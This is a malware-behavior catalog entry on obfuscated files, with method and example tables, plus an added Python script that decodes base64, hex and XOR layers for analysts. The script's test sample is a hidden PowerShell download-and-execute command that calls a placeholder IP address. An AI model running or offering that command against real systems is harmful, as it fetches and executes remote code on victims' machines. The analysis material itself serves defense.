Field | Value |
---|---|
ID | E1027 |
Objective(s) | Anti-Static Analysis, Defense Evasion |
Related ATT&CK Techniques | Obfuscated Files or Information (T1027, T1406) |
Anti-Analysis Type | Evasion |
Version | 2.0 |
Created | 1 August 2019 |
Last Modified | 21 November 2022 |
Malware may make files or information difficult to discover or analyze by encoding, encrypting, or otherwise obfuscating the content. In addition, a malware sample itself can be encoded or encrypted (i.e., encoding/encryption is a code characteristic).
A related MBC behavior (code characteristic), associated explicitly with executable code and making its analysis more difficult, is Executable Code Obfuscation (B0032).
Another related MBC behavior (code characteristic) is Software Packing (F0001), whose methods capture specific packers and types of compression.
See ATT&CK: Obfuscated Files or Information (T1027, T1406).
Instead of being listed alphabetically, methods have been grouped to better facilitate labeling and mapping.
Name | ID | Description |
---|---|---|
Encoding | E1027.m01 | A malware sample, file, or other information is encoded. |
Encoding-Custom Algorithm | E1027.m03 | A custom algorithm is used to encode a malware sample, file or other information. |
Encoding-Standard Algorithm | E1027.m02 | A standard algorithm (e.g., base64) is used to encode a malware sample, file, or other information. |
Encryption | E1027.m04 | A malware sample, file, or other information is encrypted. |
Encryption-Custom Algorithm | E1027.m08 | A custom algorithm is used to encrypt a malware sample, file, or other information. |
Encryption-Standard Algorithm | E1027.m05 | A standard algorithm (e.g., Rijndael/AES, DES, RC4) is used to encrypt a malware sample, file, or other information. |
Encryption of Code | E1027.m06 | A file's executable code is encrypted, but not necessarily the file's data. |
Encryption of Data | E1027.m07 | A file's data is encrypted, but not necessarily the file's code. |
Name | Date | Method | Description |
---|---|---|---|
TrickBot | 2016 | -- | Trojan spyware program that has mainly been used for targeting banking sites. |
Poison Ivy | 2005 | -- | Obfuscates files. |
WebCobra | 2018 | -- | Obfuscates files. |
GoBotKR | 2019 | -- | GoBotKR uses base64 to obfuscate strings, commands and files. [1] |
Kovter | 2016 | -- | The malware uses a key to decrypt text retrieved from a URL to create further malicious code. [2] |
Netwalker | 2020 | -- | Netwalker is obfuscated with several layers of encoding, obfuscation, and encryption techniques such as base64, hexadecimal, and XOR. [3] |
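The layered sample described in the Netwalker entry above (base64, hexadecimal and XOR stacked on one payload) is the kind of thing a static analyst has to peel by hand, and the standard-encoding methods in the table (E1027.m02) are exactly the layers that can be recognized mechanically. The following Python script is an added example; it is not code from the catalog or from any sample listed on this page. It builds a constructed blob the way a loader might (repeating-key XOR, then hex, then base64), then strips the layers outermost first, trying the stricter encoding before the looser one and recovering the XOR key with a known-plaintext crib. The crib approach generalizes beyond the single-byte XOR usually seen in such samples to any repeating key shorter than the crib. The plaintext, the key and the crib list are all assumptions made for the example.

```python
"""Peel layered obfuscation (base64 -> hex -> repeating-key XOR) from a blob.

Added example for static triage; the sample plaintext, XOR key and crib list
are constructed here and are not taken from any real sample.
"""
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Constructed stage-2 command line (assumption, not a real artefact).
PLAINTEXT = (b"powershell -w hidden -c IEX (New-Object Net.WebClient)"
             b".DownloadString('http://198.51.100.7/s2')")
KEY = bytes.fromhex("d37a91")  # constructed 3-byte repeating XOR key

B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
HEX_RE = re.compile(rb"^(?:[0-9a-fA-F]{2})+$")

# Known-plaintext cribs: fragments a decoded stage is likely to contain (assumed list).
CRIBS = [b"This program cannot be run", b"powershell", b"https://", b"http://", b"cmd.exe"]
MIN_VERIFY = 4  # crib bytes that must be left over to confirm a key hypothesis


def xor_repeating(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def obfuscate(plain: bytes, key: bytes) -> bytes:
    """Build the sample the way a loader might: XOR, then hex, then base64."""
    return base64.b64encode(binascii.hexlify(xor_repeating(plain, key)))


def try_hex(data: bytes) -> Optional[bytes]:
    s = data.strip()
    return binascii.unhexlify(s) if len(s) >= 8 and HEX_RE.match(s) else None


def try_base64(data: bytes) -> Optional[bytes]:
    s = data.strip()
    if len(s) < 8 or len(s) % 4 or not B64_RE.match(s):
        return None
    try:
        return base64.b64decode(s, validate=True)
    except binascii.Error:
        return None


def recover_xor_key(data: bytes, cribs=CRIBS, max_key_len: int = 16) -> Optional[bytes]:
    """Known-plaintext attack on repeating-key XOR.

    For each crib, offset and key length k, XOR the crib against the data window
    to get the hypothesised key stream, and accept it if the stream repeats with
    period k over the whole crib (so at least MIN_VERIFY bytes confirm it).
    Returns the key aligned to data offset 0, or None if no crib matches.
    """
    for crib in cribs:
        for off in range(len(data) - len(crib) + 1):
            stream = bytes(d ^ c for d, c in zip(data[off:off + len(crib)], crib))
            for k in range(1, min(max_key_len, len(crib) - MIN_VERIFY) + 1):
                if all(stream[j] == stream[j % k] for j in range(k, len(crib))):
                    # stream[j] == key[(off + j) % k], so key[m] == stream[(m - off) % k]
                    key = bytes(stream[(m - off) % k] for m in range(k))
                    if any(key):  # an all-zero key means the crib is already in clear
                        return key
    return None


def peel_layers(blob: bytes, max_layers: int = 8) -> Tuple[List[str], bytes]:
    """Strip encoding/encryption layers outermost first; returns (layers, residue).

    The residue is whatever was left when no decoder applied, so the analyst can
    see exactly where automation stopped (for example, a key longer than any crib).
    """
    layers: List[str] = []
    cur = blob
    for _ in range(max_layers):
        # Hex before base64: every hex string is also a syntactically valid
        # base64 string, so the stricter format must be tried first.
        if (d := try_hex(cur)) is not None:
            layers.append("hex")
        elif (d := try_base64(cur)) is not None:
            layers.append("base64")
        elif (key := recover_xor_key(cur)) is not None:
            layers.append("xor:" + key.hex())
            d = xor_repeating(cur, key)
        else:
            break
        cur = d
    return layers, cur


if __name__ == "__main__":
    layers, plain = peel_layers(obfuscate(PLAINTEXT, KEY))
    print(layers, plain == PLAINTEXT)
```

Two caveats a practitioner should carry over to real samples: the decoder order matters (a hex string decodes "successfully" as base64 into garbage, so the tighter grammar goes first), and a crib can only recover a key that is several bytes shorter than the crib itself. When the key is longer than every crib, or the payload contains none of the expected fragments, `peel_layers` returns the undecoded residue rather than guessing, which is the point at which the analyst falls back to frequency analysis or to pulling the key out of the loader's code.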
[1] https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
[2] https://www.bleepingcomputer.com/virus-removal/remove-kovter-trojan
[3] https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html